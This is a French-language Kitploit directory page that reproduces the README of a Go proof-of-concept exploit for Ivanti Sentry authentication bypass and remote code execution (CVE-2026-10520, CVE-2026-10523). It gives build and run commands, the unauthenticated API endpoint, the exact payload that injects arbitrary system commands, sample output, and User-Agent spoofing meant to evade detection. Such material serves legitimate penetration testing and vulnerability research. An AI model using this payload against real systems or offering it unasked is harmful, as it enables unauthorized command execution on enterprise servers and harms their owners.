Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/gagaltotal/cve-2026-10523-ivanti-sentry
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleAuthentification
GitHubgagaltotal/cve-2026-10523-ivanti-sentry

CVE-2026-10523-Ivanti-sentry

Voir le dépôt
Site web
313il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Outil de détection de preuve de concept pour les vulnérabilités de contournement d'authentification et d'exécution de code à distance Ivanti Sentry (CVE-2026-10520, CVE-2026-10523). Envoie des requêtes API malveillantes pour exécuter des commandes système et valider les déploiements vulnérables.

Partager

CVE-2026-10523 - Outil de détection RCE pour Ivanti Sentry

Un outil de détection de preuve de concept complet pour tester les vulnérabilités Ivanti Sentry liées au contournement d'authentification et à l'exécution de code à distance. Cet outil identifie les systèmes vulnérables à CVE-2026-10520 et CVE-2026-10523.

Aperçu

Ce projet est conçu pour détecter et valider si une instance Ivanti Sentry est vulnérable à des failles critiques de contournement d'authentification et d'exécution de code à distance. L'outil envoie des messages spécialement conçus via le point de terminaison API Ivanti Sentry pour exécuter des commandes système et extraire les résultats, permettant aux chercheurs en sécurité et aux testeurs d'intrusion d'identifier les déploiements vulnérables.

Détails des vulnérabilités

CVE-2026-10520

Vulnérabilité de contournement d'authentification dans Ivanti Sentry qui permet un accès non authentifié à des points de terminaison API restreints.

CVE-2026-10523

Vulnérabilité d'exécution de code à distance dans Ivanti Sentry qui permet l'exécution de commandes système arbitraires via l'API de messagerie lorsqu'elle est combinée au contournement d'authentification.

Fonctionnalités

  • Détection non authentifiée d'instances Ivanti Sentry vulnérables
  • Capacité d'exécution de commandes système pour la validation de preuve de concept
  • Prise en charge des connexions HTTP et HTTPS avec contournement de la vérification TLS
  • Prise en charge d'un proxy pour les tests via des intermédiaires
  • Extraction propre de la sortie des commandes à partir des réponses XML
  • Gestion sécurisée des erreurs avec retour d'information informatif
  • Délai d'attente configurable et limites de taille de réponse

Prérequis

  • Go 1.26.4 ou supérieur
  • Accès réseau à l'instance Ivanti Sentry cible
  • URL cible valide avec protocole (HTTP ou HTTPS)

Installation

Clonez le dépôt et accédez au répertoire du projet :

root@kitploit:~
git clone https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry
cd CVE-2026-10523-Ivanti-sentry

Initialisez le module et installez les dépendances

root@kitploit:~
go mod init CVE-2026-10523-Ivanti-sentry
go mod tidy

Compilez l'exécutable :

root@kitploit:~
go build -o tot_poc tot_poc.go

Utilisation

Screen Capture

L'outil nécessite deux paramètres obligatoires : l'URL cible et la commande à exécuter.

Utilisation de base

Screen Capture

Exécutez une commande simple sur la cible :

root@kitploit:~
./tot_poc -url https://target.example.com:8443 -cmd "uname -a"

Options de la ligne de commande

  • -url (obligatoire) : URL de base cible incluant le protocole (ex. https://127.0.0.1:8443)
  • -cmd (obligatoire) : Commande à exécuter pour la détection de vulnérabilité (ex. "uname -a", "id", "whoami")
  • -p ou -proxy (optionnel) : Adresse et port du proxy pour router le trafic (ex. 127.0.0.1:8080)

Exemples d'utilisation

Screen Capture

Détectez la vulnérabilité avec une commande simple d'informations système :

root@kitploit:~
./tot_poc -url https://192.168.1.100:8443 -cmd "uname -a"

Exécutez avec une configuration proxy :

root@kitploit:~
./tot_poc -url https://target.example.com:8443 -cmd "whoami" -proxy 127.0.0.1:8080

Exécutez une commande pour extraire les informations système :

root@kitploit:~
./tot_poc -url https://sentry-instance.internal:8443 -cmd "cat /etc/os-release"

Sortie

L'outil affichera :

  1. Une bannière avec les informations de la vulnérabilité
  2. L'URL cible, la commande et la configuration proxy (le cas échéant)
  3. Des messages d'état en temps réel indiquant la progression des requêtes
  4. Les résultats de l'exécution de la commande si la cible est vulnérable
  5. Des messages d'erreur si la cible n'est pas vulnérable ou si la connexion échoue

Sortie de détection réussie

root@kitploit:~
Cible : https://192.168.1.100:8443
Commande : uname -a

[+] Envoi de la vérification d'exécution de commande à : https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[+] La cible semble vulnérable.

Sortie de la commande :
Linux sentry-server 5.10.0-8-generic x86_64 GNU/Linux

Sortie de détection échouée

root@kitploit:~
Cible : https://192.168.1.100:8443
Commande : uname -a

[+] Envoi de la vérification d'exécution de commande à : https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[-] La cible ne semble pas vulnérable.

Détails techniques

Vecteur d'attaque

L'outil exploite le point de terminaison /mics/api/v2/sentry/mics-config/handleMessage qui est accessible sans authentification. La charge utile est construite comme suit :

root@kitploit:~
message=execute+system+/configuration/system/commandexec+<commandexec><index>1</index><reqandres>[COMMAND]</reqandres></commandexec>

La réponse contient la sortie de la commande au format XML dans une balise success.

Fonctionnalités de sécurité

  • Contournement de la vérification TLS pour tester les certificats auto-signés
  • Délais d'attente HTTP configurables pour éviter les requêtes bloquées
  • Limitation de la taille de réponse (10 Mo) pour éviter l'épuisement de la mémoire
  • Gestion appropriée des erreurs pour les réponses mal formées
  • Usurpation du User-Agent pour éviter les mécanismes de détection simples

Fonctionnement

  1. Analyser les arguments de la ligne de commande pour l'URL cible et la commande
  2. Créer un client HTTP avec une configuration proxy optionnelle
  3. Construire la charge utile avec la commande fournie par l'utilisateur
  4. Envoyer une requête POST au point de terminaison vulnérable
  5. Extraire la sortie de la commande de la structure de réponse XML
  6. Afficher les résultats ou les messages d'erreur en conséquence

Avertissement

Cet outil est fourni à des fins de tests de sécurité autorisés et de recherche uniquement. Les utilisateurs sont seuls responsables de s'assurer qu'ils disposent des autorisations appropriées avant de tester tout système. L'accès non autorisé aux systèmes informatiques est illégal. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil.

Prérequis et limitations

  • La cible doit être une instance Ivanti Sentry vulnérable
  • Une connectivité réseau vers le système cible est requise
  • Le délai d'attente par défaut est de 10 secondes par requête
  • La taille maximale de réponse est limitée à 10 Mo
  • Efficace uniquement sur les systèmes exécutant des versions vulnérables d'Ivanti Sentry
  • La validation du certificat TLS est désactivée à des fins de test

Auteur

GhostGTR666 - Gagaltotal666

Dépôt

https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry

Licence

Ce projet est fourni tel quel à des fins de recherche en sécurité et éducatives.

Références

  • CVE-2026-10520 : Contournement d'authentification Ivanti Sentry
  • CVE-2026-10523 : Exécution de code à distance Ivanti Sentry
Télécharger l’outil